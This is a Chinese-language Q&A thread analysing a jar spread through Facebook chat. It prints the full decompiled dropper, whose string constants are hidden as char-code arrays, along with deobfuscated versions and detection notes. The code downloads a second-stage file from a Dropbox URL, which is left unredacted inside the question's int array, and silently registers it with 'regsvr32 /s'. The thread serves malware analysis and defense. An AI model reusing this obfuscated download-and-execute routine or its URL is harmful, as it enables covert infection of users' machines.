我在facebook上引用了两次这个消息" lol abc.rar" ,abc.rar文件有一个可执行的jar文件,一旦点击就试图连接到Facebook并随机输入相同的消息给另一个聊天。我使用jd gui 0.36对它进行了反编译,并在此恶意软件/病毒中发现了一个类czjffdqozxffyhrq,其中还有一个清单文件。我尝试了 VirusTotal,但它没有给出任何结果。这肯定是一个威胁,因为它来自我的两个facebook朋友,他们彼此无关,所以它传播得非常快 VirusTotal 结果: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/
现在的类代码:-package com.cakes;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
/**
 * Decompiled dropper stage of the sample discussed in the question (analyst
 * annotations added; code left exactly as decompiled).
 *
 * Control flow visible in this class: main() creates C:\temp, checks whether the
 * second-stage file is already present, and either re-registers it with regsvr32
 * or downloads it first and then registers it. Nothing in this class touches
 * Facebook; the messaging behaviour described in the question must live in the
 * downloaded component, which is not on this page.
 *
 * Every string constant is stored as an int[] of char codes and rebuilt at runtime
 * (mrdbdgwortilmglt, olzezeaokmr, wxujpwlzjfvvc, uwqeeyesndtlyfye). That defeats a
 * plain strings dump of the jar, which is the most plausible reason a static scan
 * found nothing to match on. Behaviourally, a Java process spawning "regsvr32 /s"
 * against a file under C:\temp, and a Java process fetching from
 * dl.dropboxusercontent.com, are the indicators a defender can key on.
 *
 * Note on the int arrays: the path constants contain the sequence 92, 92, i.e. two
 * literal backslash characters, so the runtime strings carry doubled backslashes
 * (C:\\temp\\...). Windows path handling generally tolerates this, but a detection
 * rule written against the exact regsvr32 command line should allow for it.
 */
public class czjffdqozxffyhrq
{
/**
 * Rebuilds the download URL from char codes.
 *
 * @return an http:// URL on dl.dropboxusercontent.com pointing at a .dat file
 *         (the answer below shows it with the file name redacted). It is plain
 *         HTTP as written, so the fetch is also visible to network monitoring.
 */
public static String mrdbdgwortilmglt()
{
int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };
StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
// Each int is a char code; appending one by one reassembles the string.
cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
}
return cfmbxqxdanzahnu.toString();
}
/**
 * Rebuilds the drop path of the second stage.
 *
 * @return "C:\\temp\\qvsfccjm.gtj" (two literal backslashes per separator, see the
 *         class comment). The .gtj extension is arbitrary; regsvr32 loads the file
 *         as a DLL regardless of its name.
 */
public static String olzezeaokmr()
{
int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
for (int i = 0; i < wwlytwss.length; i++) {
uurwhymtb.append((char)wwlytwss[i]);
}
return uurwhymtb.toString();
}
/**
 * Rebuilds the drop directory.
 *
 * @return "C:\\temp\\" (again with doubled backslashes).
 */
public static String wxujpwlzjfvvc()
{
int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };
StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
for (int i = 0; i < krihniioygdowfq.length; i++) {
dmpxcpok.append((char)krihniioygdowfq[i]);
}
return dmpxcpok.toString();
}
/**
 * Rebuilds the command line used to activate the second stage.
 *
 * @return "regsvr32 /s C:\\temp\\qvsfccjm.gtj". The /s switch suppresses the
 *         regsvr32 result dialogs so the user sees nothing. Runtime.exec(String)
 *         splits this on whitespace, so it runs as program "regsvr32" with two
 *         arguments.
 */
public static String uwqeeyesndtlyfye()
{
int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
for (int i = 0; i < wwlytwsspath.length; i++) {
eiljiba.append((char)wwlytwsspath[i]);
}
return eiljiba.toString();
}
/**
 * Spawns the regsvr32 command six times (m runs 1..6).
 *
 * The returned Process handles are discarded, so exit codes are never checked;
 * the repetition is presumably a crude retry, but the reason for exactly six
 * launches is not visible here. Six regsvr32 child processes of a Java process
 * in quick succession is a distinctive process-tree signature.
 *
 * @throws IOException if regsvr32 cannot be started (e.g. not on Windows).
 */
public static void bnyikewbdrqhetgb()
throws IOException
{
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(uwqeeyesndtlyfye());
m++;
}
}
/**
 * Entry point of the dropper.
 *
 * Creates C:\temp (mkdir result ignored), then: if the second-stage file is already
 * on disk, just re-registers it; otherwise downloads it and registers it (the
 * registration happens inside lslmzhpvu). The existence check means a second run
 * of the jar works offline once the file has been dropped.
 *
 * @param args ignored.
 * @throws Exception propagated from the download or process launch.
 */
public static void main(String[] args)
throws Exception
{
new File(wxujpwlzjfvvc()).mkdir();
File u = new File(olzezeaokmr());
if (u.exists())
{
bnyikewbdrqhetgb();
}
else
{
String pdisodea = mrdbdgwortilmglt();
String lwpztudm = olzezeaokmr();
lslmzhpvu(pdisodea, lwpztudm);
}
}
/**
 * Downloads rklnt to the file nenyy, then registers the file with regsvr32.
 *
 * The inner "int length;" on the loop body is a decompiler artifact (it shadows the
 * outer declaration and would not compile as posted); the bytecode simply copies
 * the stream in chunks of up to 432101 bytes. Neither stream is closed if read()
 * or write() throws. On success, control goes straight to bnyikewbdrqhetgb(), so a
 * truncated or tampered download would still be handed to regsvr32.
 *
 * @param rklnt URL to fetch.
 * @param nenyy destination file path.
 * @throws IOException on any network or file error.
 */
public static void lslmzhpvu(String rklnt, String nenyy)
throws IOException
{
URL hsnmxltpgt = new URL(rklnt);
InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
OutputStream uxvkcl = new FileOutputStream(nenyy);
byte[] b = new byte[432101];
int length;
while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
{
int length;
uxvkcl.write(b, 0, length);
}
mlzfltpyqeoqdahzvel.close();
uxvkcl.close();
bnyikewbdrqhetgb();
}
}
有人可以解释这是如何工作的,为什么它仍然无法检测到?
答案 0 :(得分:3)
这是一个非常微不足道的混淆尝试。
方法:
mrdbdgwortilmglt
olzezeaokmr
wxujpwlzjfvvc
uwqeeyesndtlyfye
只是String
隐藏为整数数组。
bnyikewbdrqhetgb
显然很顽皮,因为它正在调用Runtime.getRuntime().exec
...这应该始终是代码中的警告标志。
lslmzhpvu
正在访问网址...也很顽皮。
所谓"顽皮",在这里我的意思是代码会触及自身之外的东西,因此可能在其他地方造成伤害。在您下载的代码中,这应该是一个重要的警示标志,除非您知道该代码本来就应该访问URL或执行外部程序。
它正在抓住它。它会检测未经授权的访问URL的尝试并发出警告。
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
/**
 * The answer's hand-deobfuscated rendering of the class in the question: the
 * int[]-encoded constants are written out as literals and the random method names
 * are replaced with descriptive ones. Logic is unchanged from the decompile.
 *
 * Two details an analyst should keep in mind when reading this version:
 * the original int arrays contain 92, 92 for each path separator, so the runtime
 * strings actually carry doubled backslashes (the literals below render them as
 * single ones); and the "int length;" inside the copy loop is a decompiler
 * artifact carried over verbatim, not something the author wrote.
 */
public class czjffdqozxffyhrq
{
/** @return the second-stage download URL (host dl.dropboxusercontent.com, plain HTTP). */
public static String getDropBoxURL() {
// This URL has been bowdlerized to protect the dangerously curious
return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
}
/** @return the drop path; the extension is arbitrary, regsvr32 loads it as a DLL. */
public static String getTempFile() {
return "C:\\temp\\qvsfccjm.gtj";
}
/** @return the drop directory created by main(). */
public static String getTempDir() {
return "C:\\temp\\";
}
/** @return the activation command; /s hides the regsvr32 result dialogs from the user. */
public static String getRegisterCommand() {
return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
}
/**
 * Launches the regsvr32 command six times; Process handles and exit codes are
 * discarded. A Java process spawning several regsvr32 children against a file
 * under C:\temp is the process-tree indicator worth alerting on.
 *
 * @throws IOException if regsvr32 cannot be started.
 */
public static void registerControlSixTimes() throws IOException {
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(getRegisterCommand());
m++;
}
}
/**
 * Creates the drop directory, then registers the payload if it is already present,
 * otherwise downloads it first (registration then happens inside
 * downloadFromURLToFile). Nothing here contacts Facebook; that behaviour, if real,
 * is in the downloaded file.
 *
 * @param args ignored.
 * @throws Exception propagated from download or process launch.
 */
public static void main(String[] args) throws Exception {
new File(getTempDir()).mkdir();
File u = new File(getTempFile());
if (u.exists())
{
registerControlSixTimes();
}
else
{
String dbURL = getDropBoxURL();
String tempFileName = getTempFile();
downloadFromURLToFile(dbURL, tempFileName);
}
}
/**
 * Copies urlString to fileName in chunks of up to 432101 bytes, then hands the file
 * to regsvr32. Streams are not closed on error, and no integrity check is made
 * before registration.
 *
 * @param urlString URL to fetch.
 * @param fileName destination path.
 * @throws IOException on network or file error.
 */
public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
URL url = new URL(urlString);
InputStream in = url.openStream();
OutputStream out = new FileOutputStream(fileName);
byte[] b = new byte[432101];
int length;
while ((length = in.read(b)) != -1) {
int length;
out.write(b, 0, length);
}
in.close();
out.close();
registerControlSixTimes();
}
}
答案 1 :(得分:3)
基本上它从;
下载文件http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1
(链接已做混淆处理,以免有人误下载)
...到c:\temp,并使用;
在系统中注册它regsvr32 /s <filename>
真正的邪恶可能在下载的文件中(我不打算下载:))